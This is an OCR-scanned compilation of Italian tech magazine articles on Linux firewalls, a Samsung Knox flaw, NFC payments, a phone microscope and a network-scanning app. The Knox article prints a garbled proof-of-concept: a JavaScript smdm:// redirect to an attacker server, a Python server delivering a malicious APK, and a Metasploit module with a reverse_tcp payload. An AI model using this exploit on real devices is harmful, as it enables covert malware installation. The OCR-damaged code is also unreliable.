viene utilizzato per manipolare o decidere la sorte del traffico 
di rete diretto all'interno o attraverso il server. Tutte le moder- 
ne soluzioni firewall sviluppate per GNU/Linux usano proprio 
questo sistema per il filtraggio dei pacchetti. 


Netfilter è configurato attraverso il programma iptables, che 
permette di definire le regole per i filtri di rete e il reindiriz- 
zamento NAT. Di solito, con il termine iptables ci si riferisce 
all'intera infrastruttura, incluso Netfilter. Quando un pacchetto 
raggiunge il proprio server, esso è gestito in affidamento al sot- 
tosistema Netfilter per l'accettazione, la manipolazione, o il ri- 
fiuto in base alle regole fornite attraverso iptables. Lo strumen- 
to di configurazione del firewall di default per Ubuntu è Ufw. 
Sviluppato per facilitare la configurazione del firewall iptables, 
questo tool offre un modo facile da usare per creare un firewall 
basato su host IPv4 o IPv6. Dopotutto, è proprio la facilità d'uso 
il punto di forza che ha reso la distro di casa Canonical la più 
diffusa fra gli utenti del Pinguino. Tramite la sua interfaccia di 
comando, Ufw non è destinato a fornire funzionalità complete 
di firewall, ma fornisce invece un modo semplice per aggiun- 
gere o rimuovere le regole da far seguire al firewall stesso. E 
se volessimo realizzare un firewall completo senza conoscere 
approfonditamente iptables? Anche in questo caso gli strumenti 
non mancano. Firestarter e Fwbuilder sono solo due esempi 
dotati di un'interfaccia grafica. Se invece preferiamo affidarci 
a tool a riga di comando (dunque con file di configurazione di 
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® Fig. 4 * L'interfaccia grafica di Firestarter 


solo testo) possiamo affidarci a Shorewall (una soluzione molto 
potente per configurare un firewall avanzato per qualsiasi rete), 
ipkungfu (di facilissima impostazione) e Fireflier. 

Molti firewall nascondono degli indirizzi IP proprio a causa 
del loro principio di funzionamento. Non è una sorpresa che 
GNU/Linux possa anche supportare la possibilità di nasconde- 
re l'indirizzo attraverso quello che viene chiamato IP masque- 
rading. Il compito dell'IP masquerading è quello di consentire 
alle macchine con indirizzi IP privati e non instradabili della 
rete di accedere a Internet attraverso la macchina che opera il 
masquerading (detto così sembra complicato, ma è un mecca- 
nismo abbastanza banale). Il traffico dalla rete privata verso 
Internet deve essere manipolato per ottenere risposte che siano 
re-instradabili alla macchina che ha fatto la richiesta. Per fare 
ciò, il kernel deve modificare l'indirizzo IP sorgente di ciascun 
pacchetto in modo che le risposte vengano re-instradate ad esso 
invece che all'indirizzo IP privato che ha fatto la richiesta. 
Ubuntu utilizza il tracciamento della connessione (conntrack) 
per tenerne traccia e reindirizzarle a ciascun pacchetto di rispo- 
sta. Il traffico in uscita dalla rete privata viene quindi "masche- 
rato", come l'uscita dalla macchina gateway Ubuntu. 


TOOL DI CONFIGURAZIONE 


Poco fa abbiamo scoperto alcuni dei tool utilizzati per la confi- 
gurazione di un Firewall. È arrivato il momento di analizzarli 
più nel dettaglio. Firestarter (Fig. 4) è un'applicazione che for- 
nisce un'interfaccia grafica per la rapida configurazione delle 
regole e delle impostazioni del firewall, Firestarter di per sé 
non è un frontend per la configurazione di iptables e fornisce, 
inoltre, anche il monitoraggio in tempo reale del traffico di rete. 
Firewall Builder è costituito da una GUI orientata agli ogget- 
ti e una serie di compilatori per varie piattaforme firewall. In 
Firewall Builder, la politica è un insieme di regole: ogni re- 


gola consiste di oggetti astratti che rappre- 
sentano servizi (host, router, firewall, reti, 
protocolli) di rete reali. Firewall Builder 
aiuta l'utente a mantenere sicuro un data- 
base di oggetti e permette la modifica della 
politica del firewall con semplici opera- 
zioni di drag-and-drop. Anche Shorewall 
è utilizzato per semplificare la gestione di 
complesse configurazioni di rete. È confi- 
gurato attraverso un file di configurazione 
di testo semplice ben commentato. Dunque, 
non possiede un'interfaccia grafica, anche 
se è disponibile separatamente un modulo 
Webmin (che ci permette dunque di gesti- 
re il tool tramite un'interfaccia Web). Sho- 
rewall può essere utilizzato su un sistema 
firewall dedicato, un gateway/router/server 
multi-funzione o su un sistema GNU/Li- 
nux stand-alone. Shorewall non utilizza la 
modalità di compatibilità ipchains di Net- 
filter e può quindi sfruttare le funzionalità 
di monitoraggio dello stato di connessione 
di Netfilter. Tra gli strumenti di configu- 
razione iptables disponibili, non è il più facile da utilizzare, 
ma in compenso dimostra di essere il più flessibile e potente. 
Ipkungfu Linux è un firewall basato su iptables. Gli obiettivi 
di progettazione principali sono la sicurezza, la facilità d'uso 
e prestazioni. Si avvale di funzioni avanzate di iptables e del 
kernel Linux, Ipkungfu è in grado di gestire una vasta gamma 
di configurazioni e supporta la condivisione di connessione a 
Internet, più host virtuali, IP masquerading, string matching e 
molto altro ancora, 

Fireflier, infine, permette di creare regole basate su pacchetti 
singoli di rete in entrata o semplicemente di consentire o ne- 
gare il passaggio a singoli pacchetti. È dotato di un approccio 
client-server per la gestione da un altro PC e connessione SSL 
tra client e server. 


TIRIAMO LE SOMME 


Com'è facile intuire a seguito di quanto detto nei paragrafi pre- 
cedenti, la sicurezza di una qualsiasi distro GNU/Linux è di 
gran lunga superiore a quella di un sistema Windows o Mac OS 
X. E ciò non viene di certo detto per partito preso, ma proprio 
perché, come abbiamo avuto modo di scoprire, ci sono alcuni 
meccanismi alla base in grado di determinare un altissimo gra- 
do di sicurezza. 

Basterebbe la sola natura Open Source di una distro come 
Ubuntu per far dormire sonni tranquilli ad ogni utente. Ma, 
qualora ciò non bastasse, abbiamo scoperto che i firewall di 
certo non mancano. A differenza di un “muro di fuoco” proget- 
tato per Microsoft Windows, però, una soluzione sviluppata per 
GNU/Linux riesce a scavare più a fondo, agendo direttamente 
al cuore del sistema operativo. Certo, la sicurezza di una distro 
non è determinata esclusivamente dal tipo di connessioni ac- 
cettate in ingresso o in uscita, ma ciò che abbiamo scoperto in 
queste pagine è già una gran cosa. 
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Samsung Knox è uno strumento inventato per crittografare parte 
di un dispositivo mobile Android. Ma contiene un pericoloso bug 
che può permettere ad un pirata di installare un'applicazione 
malevola con privilegi assoluti di accesso al sistema 


Pi e più volte abbiamo fatto luce sui bug 
che nascono in quei programmi scritti 
proprio con lo scopo di aumentare la sicu- 
rezza dei sistemi informatici. È un paradosso 
che risulterebbe molto divertente, se non com- 
portasse un problema serio per la sicurezza. 
Il caso di Samsung Knox rientra proprio in 
questo paradigma. Knox è un sotto-sistema 
Android sviluppato per proteggere alcuni dati 
tramite crittografia. L'idea è di per sé interes- 
sante: in effetti, oggi sugli smartphone siamo 
abituati a registrare dati sensibili. Se perdessi- 
mo il nostro dispositivo mobile, il danno cco- 
nomico sarebbe il problema minore, rispetto 
alla perdita (o, peggio, al furto) di informa- 
zioni private. Ma Samsung Knox è un sistema 
molto complesso e, come è abbastanza scon- 
tato, più un sistema è complicato più sarà pro- 
babile che contenga un bug. 


COME FUNZIONA KNOX? 


Knox appare come una semplice applicazione, 
installabile dal Play Store sui dispositivi Sam- 
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sung Galaxy (soprattutto quelli di fascia alta). 
In realtà, installa un sistema operativo parallelo 
ad Android, i cui file sono crittografati. 

È possibile passare da Android al sistema Knox 
e viceversa, inserendo una apposita password. 
Quindi, è come se sul dispositivo fossero in ese- 
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cuzione due diversi sistemi operativi contem- 
poraneamente. Knox applica anche delle mo- 
difiche al bootloader, che rendono più difficile 
l'installazione di altri sistemi. Inoltre, e questo è 
in realtà uno dei suoi lati peggiori, tiene traccia 
di tutte le modifiche eseguite al sistema, come 
lo sblocco del bootloader o qualsiasi altra ope- 
razione possa invalidare la garanzia. Ciò che 
preoccupa, di questa caratteristica, è che si è 
scoperto che i dati sulle modifiche vengono in- 
viati a Samsung. Quindi, se disponiamo di un 
dispositivo con Knox non possiamo modificar- 
lo in alcun modo, altrimenti la garanzia sarà im- 
mediatamente annullata (e perdere la garanzia 
su un dispositivo da almeno 300 euro non è una 
bella cosa). Per chi vuole fare il “bravo ragaz- 
zo” ed utilizzare soltanto gli strumenti ufficiali 
forniti da Google e Samsung, comunque, Knox 
è una buona soluzione per avere un discreto 
grado di sicurezza. 

Come dicevamo, Samsung Know è molto più 
di una semplice app, anche se può apparire 
tale. È un intero sotto-sistema operativo, ed il 
suo pacchetto di sicurezza include diverse altre 
applicazioni. Una di queste è chiamata Uni- 
versalMDMClient, e consente l'installazione 
automatica di app che fanno parte dello stesso 
pacchetto Knox (ad esempio, Knox EMM, che 
consente il controllo remoto del dispositivo ed 
il suo rintracciamento GPS nel caso di smarri- 
mento). UMC, questo l'acronimo di Universal 
MDMClient, è quindi un gestore di aggior- 
mamenti, che si occupa esclusivamente della 
app di sicurezza del progetto Samsung Knox. 
A questa app è associato il protocollo smdm. 
In altre parole, quando un utente clicca su un 
link che inizia con smdm://, viene chiamato 
automaticamente UMC per gestire la richiesta. 
L'intestazione della pagina del link viene con- 
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MH Fig. 1 La differenza tra un normale sistema Android e Samsung Knox 


trollata per vedere se contenga il nome di una 
applicazione installata nel sistema, e se la sua 
versione sia più recente di quella attualmente 
installata. In caso positivo, chiede all'utente la 
conferma di aggiornamento. Se l'utente rispon- 
de affermativamente (cosa che, distrattamente, 
fa qualsiasi utente), il corpo della pagina viene 
inserito in un file .apk, che viene poi installato. 
C'è un problema: il sistema non verifica che il 
contenuto del corpo della pagina contenga dav- 
vero un .apk valido per l'applicazione presenta- 


ta nell'intestazione. 


NESSUN CONTROLLO 
SUGLI APK 


Il difetto cui abbiamo appena accennato im- 
plica che un pirata potrebbe realizzare una 
pagina fittizia che nell'intestazione presenta 
il nome di un'applicazione certamente in- 
stallata su un dispositivo dotato di Samsung 
Knox, indicando un numero di versione su- 
periore all'ultima rilasciata. In questo modo, 
UMC avvierebbe l'aggiornamento. Il corpo 
della pagina, però, può essere realizzato con 
un .apk di una applicazione completamente 
diversa, per esempio una malevola. Visto 
che UMC non controlla che il nome della 
app presentata nell'intestazione coincida 
con quello della applicazione, installerà 
l''apk piratato convinto di avere eseguito un 
semplice aggiornamento. La parte peggio- 
re è che la nuova applicazione può avere 


raticamente qualsiasi privilegio. Chiun- 
q £ 


que abbia utilizzato Android sa che durante 


E Fig. 2 è Il messaggio di avviso che 
appare all'utente: se preme OK, il 
pirata ha vinto 


l'installazione di un'app vengono da essa 
richiesti i permessi di accesso ad alcune 
componenti del sistema (file system, GPS, 
Wi-Fi, ecc). Ma durante l'aggiornamento 
con UMC questo non avviene. O, meglio: 
all'applicazione viene automaticamente ga- 
rantito l'accesso a qualsiasi componente del 
sistema. In altre parole, è possibile per un 
pirata realizzare un'app capace di fare qual- 
siasi cosa, e convincere un utente ad instal- 
larla con un semplice trucco. 

Il pirata deve soltanto inserire un codice di 


questo tipo: 


<script» 


function trigger(){ 


document: .location="smdm://} 
?update url yourserver/"; 


l'imeout (tri 5000); 


</script> 


in una pagina Web: appena l'utente visita 
la pagina con il proprio smartphone, UMC 
l'\apk 
all'indirizzo http://yourserver/. 


scaricherà ed installerà presente 
Mettere in 
piedi un server che fornisca un .apk è abba- 


stanza semplice con Python: 


import hashlib 
from BaseHTTPServer import BaseHTTÌ 


PRequestHandler 


= "meow.apk" 
= open(APK FILE, "rb"). ì 
read() 
APK_STZE = str(len(APK DATA)) 


IAPK HASH hashlib.md5(APK DATA). 


Prima di tutto, si importano le librerie ne- 
cessarie e si carica il contenuto binario del 


file .apk dell'app malevola. 


class MyHandler (BaseHTTPRequestHand} 
ler): 
def do GET(se 
send response(200) 
d header("Content-13 
Length", APK SIZE) 
send header ("ETag", 1 
APK HASH) 
self.send header ("x-amz-mel 
ta-apk-version", "1337") 


end headers () 


return 


def do HEAD(self): 


lf.send response(200) 


self.send header("Content-1} 


Length", APK SIZE) 
nd header("ETag", ì 
APK HASH) 
send header ("x-amz-mel 
ta-apk-version", "1337") 
self.end aders() 


return 


È poi necessario inviare l'intestazione del- 
la pagina, cioè quella parte che spinge il 
sistema UMC ad avviare l'aggiornamento. 
Subito dopo, scriviamo sulla stessa pagina 
il contenuto dell'.apk (che avevamo inserito 
nella variabile APK_DATA). 


from B PServer import 1 
HTTPServer 
server = HITPÌ 
Server(('0.0.0.0',8080), MyHandler) 
server .serve fo ver() 
L'ultima porzione del programma è la rou- 
tine principale, che costruisce il server uti- 
lizzando la librerie e chiama le funzioni 
che abbiamo visto poco fa. È stato anche 
realizzato un apposito exploit per testare 
questa vulnerabilità con Metasploit. Per 
utilizzarlo occorre avere l'ultima versione 
di Metasploit e poi dare dalla msfconsole 


il comando 


use exploit/android/brow 


samsung knox smdm url 


È anche possibile attivare una console re- 
mota meterpreter sul dispositivo vittima, 
utilizzando il solito payload reverse_tcp. 


IL BUG È GIÀ STATO 
CORRETTO 


La soluzione è stata proposta dalla stessa 
Samsung, all'inizio di Novembre 2014. Ba- 
nalmente, la nuova versione di UMC con- 
trolla che l'applicazione ed il suo certificato 
presenti nel corpo della pagina smdm coin- 
cidano con l'app che sta per sostituire. Gli 
utenti devono semplicemente assicurarsi di 
avere sempre l'ultima versione di Samsung 
Knox installata sul proprio dispositivo. 

E, magari, non cliccare su qualsiasi link 
capiti a tiro senza prima avere verificato la 


provenienza di ciò che stanno per scaricare. 


I0 PAGO CON LO 
SMARTPHONE! 


Ecco tutto quello che c’è da sapere sui pagamenti contactless: dall'attivazione 
di una scheda SmartPass al pagamento tramite POS NFC 


C, acronimo di Near Field Communication, è una tecnologia 
sviluppata da Philips, Sony e Nokia che fornisce connettività wire- 
less a corto raggio e molto simile a quella RFID (Radio Frequen- 

cy Identification) che troviamo negli adesivi metallici attaccati su alcuni 
libri in biblioteca o sulle carte di credito, ma che, al contrario di quest’ulti- 
ma, con un numero più elevato di funzioni. Quando NFC fu lanciato, uno 
dei principali motivi della sua commercializzazione era quello di utilizzarne 
le potenzialità per effettuare pagamenti con gli smartphone. In realtà, ad 
eccezione del Giappone dove tale sistema è in uso da oltre 10 anni, NFC è 
stato utilizzato, almeno fino ad ora, solo per fini di autenticazione prima di 
consentire lo scambio veloce di informazioni fra dispositivi. Oggi, Londra 
festeggia | milione di pagamenti tramite smartphone in 9 giorni. Nel no- 
stro Paese è invece PosteMobile ad aver inaugurato i pagamenti contactless 
con cellulare, Per poter pagare tramite smartphone non basta possedere un 
dispositivo con chip NFC, è necessario anche che l'operatore fornisca una 
particolare SIM, implementazione gestita al momento solo da PosteMobile, 
Vodafone e TIM, 


LA NOSTRA PROVA SUL CAMPO 


Per verificare come funzionano i pagamenti tramite smartphone e SIM NFC 
abbiamo scelto di attivare il servizio offerto da Vodafone che utilizza una 
carta prepagata del circuito MasterCard, chiamata SmartPass, che permette 


Chi fornisce la scheda? 


non solo di effettuare pagamenti in modo tradizionale, ma può anche essere 
virtualizzata nel proprio dispositivo tramite l'applicazione di Vodafone ed 
utilizzata per i pagamenti con NFC. L'unico difetto che abbiamo riscontrato 
durante l’attivazione è il limitato numero di terminali compatibili con la 
virtualizzazione della carta. L'applicazione, infatti, funziona su quasi tutti 
i cellulari, ma quando proviamo ad aggiungere la SmartPass su uno smar- 
tphone che non sia brandizzato Vodafone o non appartenga ad una ristretta 
rosa di modelli, l'applicazione ci informa che è necessario aggiornare il sof- 
tware del telefono, anche se l'operazione non è possibile. Dopo aver attivato 
la SmartPass, abbiamo effettuato una prova di acquisto recandoci presso un 
punto ristoro MeDonald's dotato di apposito POS NFC. 


LA LISTA DELLA SPESA 


Per eseguire le nostre prove ci siamo recati in un centro Vodafone per acqui- 
stare la SIM NFC e la SmartPass utile ad effettuare pagamenti contactless. 
La SIM non è differente da quelle tradizionali e funziona soltanto in uno 
smartphone con funzionalità NFC. Contestualmente abbiamo attivato anche 
la Vodafone SmartPass, una carta di credito prepagata del circuito Master- 
Card brandizzata Vodafone e Carta SI, che è possibile ricaricare con bonifi- 
co o, come una SIM tradizionale, tramite Bancomat, Punti Vendita SISAL o 
in un centro Vodafone. Relativamente ai costi, abbiamo speso 10 curo per la 
SIM con 5 € di traffico sono subito scalati per il costo di attivazione. 


L'elenco completo degli operatori mobili che permettono di attivare una SIM NFC 


Postamat Maestro, 


Postamat Click, 
Postepay 


O 


vodafone 


SmartPass 


OPERATORE CARTE ASSOCIABILI APP PLAY STORE NOTE 


PosteMobile 


Vodafone Wallet 


Attivabile anche senza un conto BancoPosta 
con la sola Postepay. La SIM può essere 
acquistata sul Web all'indirizzo http://goo.gU/ 
np9CHa o presso uffici con corner PosteMobile 


Compatibile solo con alcuni smartphone NFC a 
brand Vodafone. 
Il pagamento è al momento possibile con la 
carta SmartPass 


A breve sarà possibile associare la prepagata 
TIM SmartPay. 
La SIM viene rilasciata gratuitamente 
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Come usare la SmartPass? 


Dopo aver attivato la SIM NFC, effettuiamo il nostro primo pagamento con lo smartphone. 
Sembra fantascienza ma è pura realtà! Ecco come fare 


LA CARTA NFC 
01 Rechiamoci presso un centro Vodafone per 
acquistare la SIM 4G NFC di Vodafone e la Smar- 
tPass. L'attivazione della scheda è effettuata dall'operato- 
re, quindi ci basta inserirla nello smartphone e scaricare 
dal Play Store di Google l'app Vodafone Wallet. 


(O 10817] 
i Wallet 


od Configura Wallet 


arte e inizia ad utilizzare 


Norme Carta 
Carta Nectar 


Numero Qurta 


Numero Codice a Barre 
416081908010 


To Cadice è Barre 


UPCa 


Note 


| Vodafone Wallet 


REC RE 
N? _ | 


ASSOCIAMO 
03 Lacarta 

Avviata l'appli- 
cazione Vodafone Wallet 
e dopo aver tappato sul 
pulsante Configura Wal- 
let, scegliamo Aggiungi 
carta. Individuata la voce 
SmartPass, inseriamo le 
credenziali d'accesso al 
sito di Vodafone (dobbia- 
mo essere già registrati 
- ogni cliente ha i suoi dati 
di accesso), il codice CVV2 
e la nostra data di nascita. 
Confermiamo con Aggiun- 
gi carta. 


UNA CARTA 
05 repettà 

Aggiungiamo una 
carta (Netcar) tappando 
sull'apposita sezione. 
Dopo aver digitato nella 
casella di ricerca il nome 
della carta fedeltà, basta 
usare il codice a barre per 
inserire la nostra carta 
o digitare il numero di 
quest'ultima (nella scher- 
mata successiva). 


SMARTPHONE ABILITATO! 
02 Per usare Vodafone Wallet attiviamo UNFC 
dello smartphone (Impostazioni). In alcuni 
modelli c'è anche l'opzione Tocca e paga che permette 
di selezionare l'applicazione di default da usare peri 
pagamenti. Colleghiamoci alla rete mobile (36/46). 


INIZIA LO SHOPPING! 

Per effettuare il pagamento, avviamo l'app Voda- 

fone Wallet e selezioniamo Paga. Avviciniamo il te- 
lefono al POS NFC: l'app ci mostra sul display l'importo da 
pagare (per cifre superiori a 25 euro è necessario inserire 
il PIN della carta). 
ee a ANCHE 
I BIGLIETTI! 
illa Utilizzando il cre- 
i dito telefonico, è possibile 
ad esempio acquistare i 
biglietti per i mezzi pub- 
blici di molte città italia- 
ne (Attp://g00.g1/BIBhyK). 
Aperta la relativa sezione 
e scelta la città, compria- 
mo il ticket. Al controllore 
mostriamo il biglietto sul 
Vodafone Wallet. 


lan Trasporti 
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Pagamenti con lo smartphone: quanto sono sicuri? 


Lo abbiamo chiesto a Raoul Chiesa, noto esperto di sicurezza informatica che ci ha detto... 


Linux Magazine «e Secondo un’indagine condotta 
dal Politecnico di Milano le carte di pagamento 
contactless NFC attive nel nostro Paese sono 

6 milioni. Tali schede permettono di usare il 
cellulare per effettuare pagamenti rapidi, senza 
dover digitare PIN o firmare alcun scontrino. Ma 
c’è da stare sicuri? Quali rischi si corrono? 


Raoul Chiesa * Il rischio, dimostrato da svariati secu- 
rity researcher ed esperti di Information Security, inclusi 
il sottoscritto e l'Ing. Selene Giupponi, è lo “sniffing”, 
ovverosia l’intercettazione del PAN (il numero della carta 
di credito) e dei dati dell’intestatario. Il “CVV” (il “co- 
dice di sicurezza") non viene intercettato, ma, per fare 
un esempio, Amazon non lo richiede per gli acquisti 
on-line, così come la maggior parte dei merchant (per 
acquisti on-line, appunto). L'abbinamento poi di NFC + 
smartphone aumenta ovviamente i rischi: quanti utenti 
hanno installato un antivirus, un rilevatore di malware sul 
proprio telefono “intelligente”? Credo stiamo parlando di 
percentuali inferiori al 5%, per essere buoni! 


Linux Magazine * Il grado di sicurezza offerto da 
questa tecnologia non dipende dallo standard NFC 
ma dai gestori dei servizi di pagamento che non 
applicano un opportuno sistema di crittografia. 
Vorremmo sapere se in Italia esistono gestori 
“sicuri”... 


Raoul Chiesa * Esattamente. No, a quanto mi risulta, 
la risposta purtroppo è negativa. Questo anche dopo 


ceco 
eos 


so 
900 censo 2015 


aver parlato con alcuni di questi player e dimostrato loro 
con un “Proof of Concept” (intercettando la loro carta 

di credito davanti ai loro occhi!) la fattibilità dell’azio- 

ne malevola, non si sono più fatti sentire. Forse, come 
spesso succede, “occhio non vede e cuore (portafoglio? 
Business?) non duole”. Il problema è esattamente nella 
non corretta implementazione della cifratura; questo è 
particolarmente strano dato che, per fare un esempio, 

la metropolitana di Parigi funziona in tecnologia NFC, è 
sicura, non è intercettabile (e quindi non è clonabile e/o 
abusabile on-line), ma lo standard di cui stiamo parlando 
è sempre lo stesso! 


Linux Magazine * Cosa si sente di consigliare ai 
nostri lettori che decidono di utilizzare questa 
nuova tipologia di pagamento? Quali precauzioni 
bisogna adottare? 


Raoul Chiesa e Una molto banale, che un caro amico in 
quel di Latina, l'Ing. Stefano Giupponi, regala come gad- 
get ai propri clienti: una custodia in metallo, nella quale 
riporre la carta NFC, che scherma appunto il segnale e 
non permette a malintenzionati di “sniffarci” la carta di 
credito. 


Linux Magazine * Lo standard NFC (Near Field 
Communications), fornisce connettività wireless 
bidirezionale a corto raggio (fino ad un massimo 
di 10 cm). Come è possibile allora che un 
malintenzionato riesca ad intercettare i dati 
scambiati tra il nostro cellulare ed il POS peri 
pagamenti? 


Raoul Chiesa « Ha presente la metropolitana di Milano 
alle 7.30 di mattina? Direi che i passeggeri sono molto 
vicini! Battute a parte, anche il wireless fornisce connet- 
tività entro certi limiti (il Wi-Fi di casa per capirci), ma 
con antenne direzionali e potenziate, possiamo arrivare 
da alcune decine di metri addirittura a chilometri. La 
stessa cosa avviene anche con NFC. Ma, ripeto, baste- 
rebbe sederci per un paio di ore davanti ad esercenti che 
accettano carte NFC (biglietterie automatiche delle Fer- 
rovie dello Stato, piuttosto che catene Autogrill, librerie 
Feltrinelli, McDonald's...) e il risultato sarebbe lo stesso. 
Vero è che le carte NFC permettono transazioni al di 
sotto di certe cifre, molto modeste (20, 30, 50 euro, in 
genere, a seconda dei Paesi), ma è altrettanto vero che 
un “mass sniffing" è realizzabile in breve tempo (minuti, 
ore, giorni) e quindi il modello di revenue per il cybercri- 
minale diventa scalabile. 


LO SMARTPHONE COME 
UN MICROSCOPIO 


Ecco come trasformare la fotocamera del nostro smartphone in un visore digitale 
utile per scoprire le meraviglie del micro mondo! 


osa si nasconde nel micro mondo che ci circonda? La superficie di un 
tavolo, apparentemente liscia al tatto, se ingrandita si mostra molto 
più “frastagliata” di quello che sembra. Allo stesso modo, una foglia 
vista al microscopio rivela una complessa e affascinante struttura vegetale. Per 
questo motivo rimaniamo sempre affascinati quando buttiamo lo sguardo nelle 
lenti di un microscopio che ci proietta nel magico dell’infinitamente piccolo. 


Sembrerà incredibile, ma anche col nostro smartphone possiamo ora esplorare 
il micro mondo: apportando una semplice modifica alla lente della fotocamera 
(senza metterne a rischio l'integrità) potremo infatti trasformarla in un potente 
microscopio digitale. Non serve installare alcuna applicazione o perdersi die- 
tro complicate operazioni di fotoritocco: basterà solo inquadrare il soggetto e 
scoprirne tutti i segreti più piccoli. Vediamo insieme di cosa si tratta! 


Proprio come MacGyver! 


by GAAItri ij 


Oltre allo smartphone, ci serve anche una piccola 

lente di ingrandimento da applicare sopra l'obietti- 
vo della fotocamera. A tal scopo, possiamo servirci della lente 
che concentra la luce nelle piccole torce portatili. 


Prendiamo l'oggetto da fotografare. Volendo fo- 

tografare materiali naturali come le foglie, è utile 
illuminarli da sotto con una torcia. Siamo pronti a mettere in 
funzione il nostro nuovo microscopio digitale! 


Applichiamo l’ingegno e trasformiamo la fotocamera del nostro smartphone 


Servendoci di una striscia di nastro adesivo fissiamo 

la lente sull'obiettivo della fotocamera. In alternativa, 
possiamo procurarci un supporto di vetro o di plexiglass traspa- 
rente su cui fissare la piccola lente e usarlo poi come “supporto”. 
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SISTEMISTI! 


L’APP DEI VERI 


Si chiama IP Tools ed è l’app Android che ti aiuta ad analizzare tutte le reti 


Wi-Fi. Ecco cosa ti permette di fare 


a connessione a Internet è troppo lenta? Il router e il nostro 
provider non hanno alcun problema e la colpa è da ricercarsi 
in un qualche client connesso alla rete locale? Questo è solo 
uno dei possibili scenari in cui un’app del calibro di IP Tools trova 
terreno fertile, soprattutto se non abbiamo voglia di accedere il PC e 
sguinzagliare uno dei numerosi tool che il mondo GNU/Linux ci offre. 


Già, perché tutto quello che ci serve è racchiuso in quest'applicazio- 


ne scaricabile gratis dal Play Store di Android. In pochi tap possiamo 
eseguire accurate analisi di rete, scovando quali client sono connessi, 
cosa stanno facendo e, addirittura, visualizzare eventuali porte aperte. 
In poche parole, tutto ciò che tool del calibro di nmap offrono quando 
siamo seduti di fronte al PC. Proprio per questo motivo, IP Tools non 
può di certo mancare nello smartphone o nel tablet del vero sistemista. 
Scopriamo come installarla e, soprattutto, come usarla! 


IP Tools: l’app che ti mancava! 


L’app è scaricabile gratuitamente dal Play Store: muoviamo i primi passi 


LA GIUSTA APP 
01 Verifichiamo che 

il nostro smar- 
tphone o tablet Android 
sia connesso al Web 
[tramite la rete 36/4G o 
con un hotspot Wi-Fi) e 
accediamo al Play Store di 
Google. Da qui, ricerchia- 
mo l'app gratuita IP Tools. 
Tappiamo quindi sul pul- 
sante Installa per proce- 
dere subito al download. 


IP} IP Tools 
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DATI 
03 pertAGLIATI 

Scorrendo verso 
il basso la pagina rias- 
suntiva della connessione 
{la home screen dell'ap- 
plicazione), possiamo 
scoprire dati abbastanza 
interessanti. Fra questi c'è 
l'indirizzo IP del gateway e 
quelli dei DNS utilizzati dal 
router. Inoltre, viene mo- 
strato il BSSID, il server 
utilizzato, il tipo di connes- 
sione e tanto altro. 


nguiuzzo & Bruagdc ast 
Maucheca di rete: 2S5 735 255 
Gatemag: 192.104 4 
Indirizza DIEMKI)}: 102. 168.43 
Indinzzo Dies) 

Stato: CONNECTED 

MENO: dea] 0407.6108 
Loowzione Durata; 3000 
Indirizzo nerver: 102 108.411 


localhost 127.00) 


Tipo di connessione Viti 


onere ' 


TUTTO SOTTO 

CONTROLLO 

Al termine 
dell'installazione, pos- 
siamo quindi avviare IP 
Tools. Prima, però, veri- 
fichiamo che il device sia 
connesso al Web tramite 
Wi-Fi e non 36/4G. Nella 
schermata principale 
dell'app vengono rias- 
sunti i dati di connessione 
(nome della rete, IP, ecc). 


37.227.209.174 


MENU 

SEMPLIFICATO 

Tappando sui tre 
punti allineati vertical- 
mente è possibile accede- 
re ad un menu semplifica- 
to dell'app. Ad esempio, 
da qui possiamo accedere 
velocemente alla pagi- 
na di configurazione del 
router [Apri la pagina web 
del router) o ottenere 
l'indirizzo IP di un host 
connesso alla rete (Ottieni 
IP dall'host). 


Tappiamo sulle 
tre linee orizzontali pre- 
senti nell'angolo in alto a 
sinistra dell'app: questo 
è il menu principale di IP 
Tools dal quale è possibile 
accedere alle decine di 
funzionalità di rete offerte 
dall'app. 

Scopriamo dettagliata- 
mente quelle più impor- 
tanti e utilizzate dai veri 
sistemisti. 


Un dispositivo 
nella nostra LAN ha delle 
porte aperte? Possiamo ve- 
rificarlo direttamente da IP 
Tools, senza dover neces- 
sariamente avviare il nostro 
PC. Verifichiamolo subito. 
Tappiamo su Scanner delle 
porte e compiliamo il primo 
campo con l'indirizzo IP 
associato al dispositivo da 
controllare. Premiamo su 
Avvia e attendiamo qualche 
secondo. 


Ma come fare a 
verificare un singolo indi- 
rizzo IP se non conosciamo 
quelli presenti nella LAN? 
Semplice! Dal menu princi- 
pale, tappiamo su Scanner 
LAN. Attendiamo qualche 
secondo prima di vedere 
a schermo tutti i device 
connessi. In questa manie- 
ra possiamo ad esempio 
scovare eventuali accessi 
non autorizzati (un pirata ha 
bucato la nostra rete?). 


Cosa succede nella tua LAN? 


Sondiamo la nostra rete locale alla ricerca di porte aperte e informazioni più dettagliate 


192.168.431 


Sempre nel menu 
principale di IP Tools, è 
presente la voce Prefe- 
renze. Da qui possiamo 
personalizzare la configu- 
razione dell'app, settando 
ad esempio le notifiche 
sonore [o tramite vibra- 
zione). Altermo stesso, è 
possibile indicare il volu- 
me della notifica stessa e 
tante altre personalizza- 
zioni. 


Dopo qualche 
secondo il verdetto verrà 
mostrato a schermo. Nel 
caso in figura, ad esem- 
pio, l'unica porta aperta 
scovata sul dispositivo 
controllato (dall'indirizzo 
IP 192.168.43.1) è la numero 
53. Possiamo inoltre set- 
tare un range di porte da 
controllare, funzionalità 
molto utile nel caso in cui 
volessimo controllare una 
singola porta. 


Se vogliamo 

dare un'occhia- 
ta alle Connessioni di rete, 
tappiamo sull'omonima 
voce sempre presente nel 
menu principale dell'app. 
Da qui possiamo vedere 
tutto ciò che i client con- 
nessi stanno facendo: tutti 
i pacchetti scambiati ven- 
gono elecanti. considerata 
la mole di informazioni 
presenti, è più agevole 
una visualizzazione su un 
display di un tablet. 
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IL PERICOLO CORRE 
SULLO SMARTPHONE! 


Come abbiamo scoperto fino ad ora, il vero punto di forza di IP 
Tools è la facilità d'uso: anche chi non ha mai utilizzato stru- 
menti di analisi di rete e non ha voglia di imparare ad usare 
mille differenti comandi può muoversi agevolmente nell’inter- 
faccia grafica dell’app e stanare ogni problematica di rete. Ma 
la cosa che ci preoccupa di più è che quest’app potrebbe fini- 
re nelle mani di malintenzionati pronti a ficcare il naso negli 
affari altrui. Pensiamo ad esempio ad un hotspot Wi-Fi aperto 
(i pub, ristoranti e i luoghi pubblici ormai pullulano di reti li- 
bere): qualcuno potrebbe “attaccare” gli altri client (scovando 
eventuali porte aperte) semplicemente maneggiando il proprio 
telefonino. Di sicuro senza dare nell'occhio. Dunque, il nostro 
consiglio, è sempre quello di tenere gli occhi bene aperti e di 


Di chi è quel dominio? 


